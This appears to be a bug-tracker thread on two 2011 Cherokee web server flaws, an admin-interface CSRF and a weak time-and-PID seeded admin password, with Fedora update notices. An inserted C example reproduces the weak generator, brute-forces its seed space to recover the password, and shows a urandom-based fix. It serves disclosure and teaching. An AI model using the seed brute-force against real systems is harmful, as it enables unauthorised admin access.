Two flaws were reported in Cherokee. The first (CVE-2011-2191) is that the Cherokee server admin configuration web interface is vulnerable to CSRF. If an admin is logged into the Cherokee admin interface and visits a site which runs a malicious script, Cherokee can be reconfigured to execute arbitrary commands [1]. The CSRF can also be used to produce a persistent XSS [2]. The second (CVE-2011-2090) is that Cherokee seeds srand() with a combination of the time and the PID of the admin process, after which rand() is called to generate a random password. This is unsafe and allows fairly easy password guessing by a local user [3].

[1] http://seclists.org/fulldisclosure/2011/Jun/0
[2] http://www.openwall.com/lists/oss-security/2011/06/03/6
[3] http://code.google.com/p/cherokee/issues/detail?id=1212
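To make the second issue concrete, here is an added example (not Cherokee's code and not part of this bug report) that models a generator seeded the way the description above says, `srand(time ^ pid)` followed by `rand()` per character, and then recovers the password from a local attacker's viewpoint: the admin process's PID and approximate start time are visible to any local user, so the attacker just re-runs the generator over that small seed space. The function names, the 12-character length, the XOR combination of time and PID, and the timestamp used in the demo are all assumptions for illustration. A hardened variant draws the characters from /dev/urandom with rejection sampling instead.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <unistd.h>

#define PW_LEN 12
/* 62 printable characters; sizeof(ALPHABET) - 1 excludes the NUL. */
static const char ALPHABET[] =
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

/* Hypothetical weak generator modelled on the CVE-2011-2090 description:
 * seed rand() from (time, pid), then pull one rand() per character.
 * Whether time and pid are XORed, added or concatenated does not matter:
 * a local user knows both to within a few bits, so the seed space is tiny. */
void weak_password(time_t t, pid_t pid, char out[PW_LEN + 1])
{
    srand((unsigned)t ^ (unsigned)pid);          /* assumed combination */
    for (int i = 0; i < PW_LEN; i++)
        out[i] = ALPHABET[rand() % (sizeof(ALPHABET) - 1)];
    out[PW_LEN] = '\0';
}

/* Local attacker: start time known to +/- window seconds (ps, /proc/<pid>/stat),
 * PID known exactly or bounded by pid_max. Enumerates every seed and compares
 * against the target (in practice, against a login oracle). Returns the number
 * of candidates tried before the hit, or -1 if none matched. */
long recover_password(const char *target, time_t t_center, int window,
                      pid_t pid_lo, pid_t pid_hi, char found[PW_LEN + 1])
{
    long tries = 0;
    char cand[PW_LEN + 1];
    for (time_t t = t_center - window; t <= t_center + window; t++) {
        for (pid_t p = pid_lo; p <= pid_hi; p++) {
            tries++;
            weak_password(t, p, cand);
            if (strcmp(cand, target) == 0) {
                strcpy(found, cand);
                return tries;
            }
        }
    }
    return -1;
}

/* Hardened generator: bytes from the kernel CSPRNG, with rejection sampling
 * so the 62-way alphabet is uniform (248 = 4 * 62 is the largest multiple
 * of 62 that fits in a byte). Returns 0 on success, -1 on I/O failure. */
int strong_password(char out[PW_LEN + 1])
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return -1;
    int n = 0;
    while (n < PW_LEN) {
        unsigned char b;
        if (fread(&b, 1, 1, f) != 1) { fclose(f); return -1; }
        if (b >= 248)
            continue;
        out[n++] = ALPHABET[b % 62];
    }
    out[PW_LEN] = '\0';
    fclose(f);
    return 0;
}

/* Constructed demo: generate with a fixed (time, pid), then recover it knowing
 * the time to +/- 5 s and only that the PID is below 32768. Returns 1 on success. */
int demo_recovers(void)
{
    char pw[PW_LEN + 1], got[PW_LEN + 1];
    time_t t = 1307000000;                       /* constructed start time */
    weak_password(t, 12345, pw);                 /* constructed PID */
    long tries = recover_password(pw, t + 3, 5, 1, 32768, got);
    return tries > 0 && strcmp(got, pw) == 0;
}

/* Two hardened draws should be well-formed and (overwhelmingly likely) distinct. */
int demo_strong_differs(void)
{
    char a[PW_LEN + 1], b[PW_LEN + 1];
    if (strong_password(a) != 0 || strong_password(b) != 0)
        return 0;
    return strlen(a) == PW_LEN && strcmp(a, b) != 0;
}

int main(void)
{
    printf("weak generator recovered by local brute force: %s\n",
           demo_recovers() ? "yes" : "no");
    printf("strong generator produces distinct passwords: %s\n",
           demo_strong_differs() ? "yes" : "no");
    return 0;
}
```

The brute force above visits at most 11 * 32768 seeds, each costing one srand() and twelve rand() calls, which is well under a second on any current machine; widening the time window to a few minutes does not change the picture. The fix is not a different way of mixing time and PID into srand(), but taking the password bytes from a CSPRNG the attacker cannot reproduce.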
Created cherokee tracking bugs for this issue Affects: fedora-all [bug 713306] Affects: epel-all [bug 713307]
Partial duplicate of 710471 (CVE-2011-2190)
Ahh, didn't see we had a bug for that already. Thanks!
This issue has been resolved via the following updates: 1) cherokee-1.2.101-1.fc15 for Fedora 15, 2) cherokee-1.2.101-1.fc14 for Fedora 14, 3) cherokee-1.2.101-1.el6 for Fedora EPEL 6, 4) cherokee-1.2.101-1.el5 for Fedora EPEL 5, 5) cherokee-1.2.101-1.el4 for Fedora EPEL 4. These updated packages have been pushed to the -testing repository, and once their required testing is complete, they will be pushed to the -stable repository.
This bug consists of two separate issues. AFAICT, the second one has been dealt with, but the first one is still open. I am not really familiar with Red Hat's workflow, but at least I have been unable to find anything fixing the CSRF bug, short of this mail sent by the upstream author, stating he has not found a way to solve it: http://www.openwall.com/lists/oss-security/2011/06/06/13